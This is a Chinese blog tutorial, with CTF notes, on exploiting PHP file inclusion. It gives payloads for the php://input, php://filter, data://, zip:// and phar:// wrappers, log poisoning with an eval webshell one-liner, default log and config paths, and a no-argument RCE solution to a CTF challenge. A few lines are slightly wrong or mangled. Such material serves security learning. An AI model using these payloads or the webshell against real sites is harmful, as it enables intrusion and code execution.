文件包含函数

最新推荐文章于 2024-03-28 20:05:34 发布
最新推荐文章于 2024-03-28 20:05:34 发布
阅读量1.2k 收藏 6
点赞数
文章标签: php web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70851535/article/details/130793928
版权

将代码传入文件,从而直接执行文件中的代码

通常文件包含漏洞产生于文件包含函数

LFI:Local File Inclusion,本地文件包含漏洞,大部分情况下遇到的文件包含漏洞都是LFI

RFI:Remote File Inclusion,远程文件包含漏洞

allow_url_fopen=On(默认为On) ,规定是否允许从远程服务器或者网站检索数据

allow_url_include=On(php5.2之后默认为Off) ,规定是否允许include/require远程文件

I、文件包含函数

  • include():遇到错误生成警告,继续执行脚本

  • require():遇到错误生成致命错误,脚本继续

  • include_once():如果文件已包含,则不再进行包含,一定程度避免错误

  • require()_once():如果文件已包含,则不再进行包含,一定程度避免错误

  • fopen():文件读取函数

  • file_get_contents():文件读取函数

II、包含漏洞利用

一、伪协议

利用伪协议上传或读取文件是文件包含漏洞里比较基础和常用的方式

PHP 提供了一些输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出等

1、 php://input

💡 `php://input` 是个可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行

需要allow_url_include=On

遇到file_get_contents() 时可用php://input绕过,但此时只能读取文件

file_get_contents()的对象赋值为php://input,从而将对象转为读取的数据

⚠️ hackbar在post数据的时候会出现问题,所以要使用burpsuite

file1 file2

?file1=**php://input <?php phpinfo();?>
?file2=php://input 1.txt**

2、php://filter

💡 `php://filter/`是一种访问本地文件的协议

当其与包含函数结合时,php://filter流会被当作php文件执行

若要想要读取文件,通过对其编码使其不执行

?file=php://filter/read=convert.base64-encode/resource=index.php

/read=convert.base64-encode/ 表示对读取数据进行base64编码

resource=index.php 表示目标文件为index.php

执行后可以获得index.php源码

file4

post: file=php://filter/read=convert.base64-encode/resource=index.php

3、data://

💡 data:[``];[charset=``];[base64],``

  • 第一部分是data:协议头,它标识这个内容为一个 data URI 资源。

  • 第二部分是MIME 类型,表示这个内容的展现方式。文本展示:text/plain ,图片展示:image/jpeg ,同时客户端也会据其进行数据解析

  • 第三部分是编码设置,默认编码是 charset=US-ASCII

  • 第四部分是 base64编码设定

  • 最后一部分为这个Data URI承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容

?file=data://text/plain,<?php phpinfo()?>    //执行phpinfo()
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=    //将命令进行base64加密,编码为“<?php phpinfo()?> ”的base64编码
?file=data:text/plain,<?php phpinfo()?>    //去掉双斜杠
?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

file3

file3=data://text/plain,<?php phpinfo()?>    //执行phpinfo()
file4=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=    //将命令进行base64加密,编码为“<?php phpinfo()?> ”的base64编码
file4=data:text/plain,<?php phpinfo()?>    //去掉双斜杠
file3=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

4、zip://

💡 `zip://` 可以访问压缩包里面的文件

zip://中只能传入绝对路径

要用#分隔压缩包和压缩包里的内容,且#要用url编码%23代替

?file=zip://D:\\file.zip%23flag.txt

file1

?file1=zip://\\var\\WWW\\html\\upload\\phpinfo.zip%23phpinfo.php

5、phar://

💡 类似`zip://`,相对路径和绝对路径都可以使用,不管后缀名是什么都会将文件当作压缩包解压

其中phar适用范围为php>5.3.0

PHAR Converter - online service for pack and unpack

?file=phar://D:\file.zip\flag.txt //绝对路径 ?file=phar://file.zip\flag.txt //相对路径

?file1=phar://C:\\phpstudy_pro\\WWW\\fi\\upload\\phpinfo.phar/phpinfo.php
?file1=phar://C:\\phpstudy_pro\\WWW\\fi\\upload\\phpinfo.jpg/phpinfo.php
?file1=phar://.\\upload\\phpinfo.jpg/phpinfo.php
?file1=phar://./upload/phpinfo.jpg/phpinfo.php linux
?file1=phar:///var/www/html/upload/phpinfo.jpg/phpinfo.php

二、包含日志文件

当访问网站时,服务器的日志中都会记录访问的行为

当我们访问链接中包含PHP一句话木马时,也会被记录到日志中

通过请求将PHP代码插入到日志文件中,再通过包含这个日志文件来执行其中的PHP代码

要求:日志文件可读,日志文件存储目录

一般日志存储目录会被修改,需要读取服务器配置文件(.conf)或者查看phpinfo()信息。通常需要curl 命令行url访问工具或者bp修改浏览器转码字符来避免转码而导致代码无法执行

Apache运行后一般默认会生成两个日志文件,Windows下是access.log(访问日志)和error.log(错误日志),Linux下是access_log和error_log

访问日志文件记录了客户端的每次请求和服务器响应的相关信息

?file1=phar://.\\upload\\phpinfo.jpg/phpinfo.php<?php @eval($_POST['ant']);?> HTTP/1.1
?file1=C:\\phpstudy_pro\\Extensions\\Apache2.4.39\\logs\\access.log.1652832000
?file1=/var/log/apache2/access.log

日志写马:

  • 获取日志路径

  • 发送请求像日志写入木马

  • 使用文件包含进行加载

文件路径
apache+Linux日志默认路径/etc/httpd/logs/access_log或/var/log/httpd/access_log
apache+win2003日志默认路径D:\xampp\apache\logs\access.log以及D:\xampp\apache\logs\error.log
IIS6.0+win2003默认日志文件C:\WINDOWS\system32\Logfiles
IIS7.0+win2003 默认日志文件%SystemDrive%\inetpub\logs\LogFiles
nginx 日志文件用户安装目录logs目录下(/usr/local/nginx/logs/access.log.)
PHPstudy日志文件%phpstudy_pro%/Extensions/Apache2.4.39/logs/access.log.[NextDay8:00-timestamp]
apache+linux 默认配置文件/etc/httpd/conf/httpd.conf或index.php?page=/etc/init.d/httpd
IIS6.0+win2003 配置文件C:/Windows/system32/inetsrv/metabase.xml
IIS7.0+WIN 配置文件C:\Windows\System32\inetsrv\config\applicationHost.config

三、伪协议被过滤后的方法

例子:[GXYCTF2019]禁止套娃

<?php include "flag.php"; echo "flag在哪里呢? "; if(isset($GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $GET['exp'])) { if(';' === preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $GET['exp'])) { // echo $GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(FILE); ?

1.由于第一个if过滤了伪协议。所以不能使用伪协议读取文件 2.知识点:(?R)是引爆点引用当前表达式,(?R)?这里多一个问号,表示可以有引用,也可以没有。'/[a-z,_],所以可以使用print(echo(1)),格式:a(b(c))括号和字符组成的,无参数RCE(远程代码执行)例子。

3.payload:exp=highlight_file(next(array_reverse(scandir(pos(localeconv))))); 4.payload:exp=highlight_file(next(array_reverse(scandir(current(localeconv()))))); current() 函数返回数组中的当前元素的值。 参数: highlight_file() 函数对文件进行语法高亮显示,本函数是show_source() 的别名 next() 输出数组中的当前元素和下一个元素的值。 array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值) scandir() 函数返回指定目录中的文件和目录的数组。 pos() 输出数组中的当前元素的值。//这个可能使用不了 localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."

诸葛成
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php常用文件操作函数汇总
10-25
主要介绍了php常用文件操作函数,以实例形式汇总了常用的文件操作函数,包括文件的打开、写入、读取等常用操作,是非常实用的技巧,需要的朋友可以参考下
各种DLL文件函数查看器
05-02
此外,如果DLL文件包含函数注释或者元数据,该软件可能还会解析出来,为开发者提供更丰富的信息,帮助理解函数的功能和使用场景。 在实际开发中,DLL文件函数查看器的应用场景广泛。例如,当我们需要调用某个第三...
文件包含常用函数
weixin_53303754的博客
10-15 327
include()、require()、include_once()、require_once()、fopen()、readfile()
文件包含
hulitong的博客
10-17 1103
0x01 函数分析 <?phpshow_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);?> strstr(): 定义和用法:搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回false。 strstr
文件包含总结
akxnxbshai的博客
11-30 1401
简单总结一下php漏洞,然后再学习java。
文件上传<?被过滤的解决方法
东隅的博客
05-26 2591
可以使用伪协议,.htacess里伪协议读入,写的图片马用base加密。 AddType application/x-httpd-php .abc php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.abc" 把后缀.abc当作php解析,然后shell.abc的内容用base64加密。比如<?php phpinfo();?>加密变成PD9waHAgcGhwaW5mbygpOz8+ .
实验报告_MATLAB函数文件程序设计_
09-29
在提供的实验报告文档中,应包含了MATLAB函数文件设计的具体示例、步骤和结果展示。通过实际操作和图片演示,读者可以更直观地理解函数文件的编写和使用方法。 综上所述,MATLAB函数文件程序设计是MATLAB编程的重要...
ReaxFF反应力场势函数文件包_ReaxFF力场文件
07-15
在LAMMPS中,ReaxFF力场文件包含了这些参数,包括键能、角度势、扭转势、电荷分布以及原子间的非键相互作用等。文件通常包含多个部分,如头文件(header)、元素信息、参数表和可能的附加信息。 1. **头文件**:这...
STM32实现跨bin文件调用函数(Firmware)
01-20
方案一是通过在Driver工程中创建一个包含函数指针的结构体,并提供一个初始化函数来设置这些指针。App在运行时调用初始化函数获取函数地址。方案二是更为直接的方法,将Driver中的函数地址直接按照4字节对齐放置在...
文件包含
qq_63527808的博客
10-22 239
程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含
php内置函数-文件包含函数
m0_60494863的博客
01-11 873
可以将别的文件直接引用过来(被引用的文件含有打印代码的话,会直接打印),如果失败了,会返回一条警告,文件会继续执行下去,通常用于动态包含。如下,我建两个 php 文件,一个写有函数声明的文件,一个函数调用的文件所以被引用的文件一般不写打印的代码,直接写函数声明即可include 引用失败的话,会返回警告,并继续执行下去,如下function.php 文件引用成功情况下引用失败(将路径写错)情况下。
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
关于文件的函数介绍
m0_71690645的博客
10-14 1293
文件函数
PHP的四个文件包含函数是什么
weixin_52139447的博客
11-24 3650
include:返回一个警告,文件继续向下执行,通常为动态包含。 include_once:返回一个警告,除了include的所有功能外,还会进行一次once检测,之前被包含的文件不会被包含。 require:一个致命错误,代码将不会向下执行,通常包含极其重要的文件,代码别想执行。 require_once:一个致命错误,除了require的所有功能外,还会进行一次once检测,防止文件被反复包含。 ...
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 5279
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
PHP文件下载上传类
josenxiao的博客
08-02 967
刚学了一点PHP,自己觉得入门很快,其实也很简单,其思维就是从其C、C++语言中搬迁而来。有很多不足之处,大家指出来: class fileup { private $filePath;//文件路径 private $fileField;//当前文件 private $originName;//文件原名 private $tmpFileName;//临时文件名 private $fileType
ctf中的一道反序列化题
weixin_40709439的博客
09-27 5259
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
PHP函数文件包含简介
weixin_50651979的博客
03-28 1129
PHP5.3及更高版本中,可以使用匿名函数。匿名函数是没有名称的函数,例如:exit()
文件包含漏洞函数区别
最新发布
04-30
文件包含漏洞和函数注入漏洞是两种不同的漏洞类型。 文件包含漏洞是指应用程序在处理用户输入时,未对用户提供的文件路径进行充分的验证,导致攻击者可以构造恶意文件路径,使应用程序在读取文件时,意外地读取了攻击者指定的文件,从而使攻击者能够执行任意代码、读取任意文件或者进行其他攻击。文件包含漏洞通常存在于应用程序中使用了动态文件包含函数,如PHP中的include()和require()等函数函数注入漏洞是指攻击者通过某种方式,在应用程序中调用了一个恶意的函数,从而使攻击者能够执行任意代码、读取任意文件或者进行其他攻击。函数注入漏洞通常存在于应用程序中使用了反射或者动态执行代码的特性,如Java中的反射机制或者eval()函数。 需要注意的是,文件包含漏洞和函数注入漏洞都是安全漏洞,需要开发人员在编写代码时进行防范和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值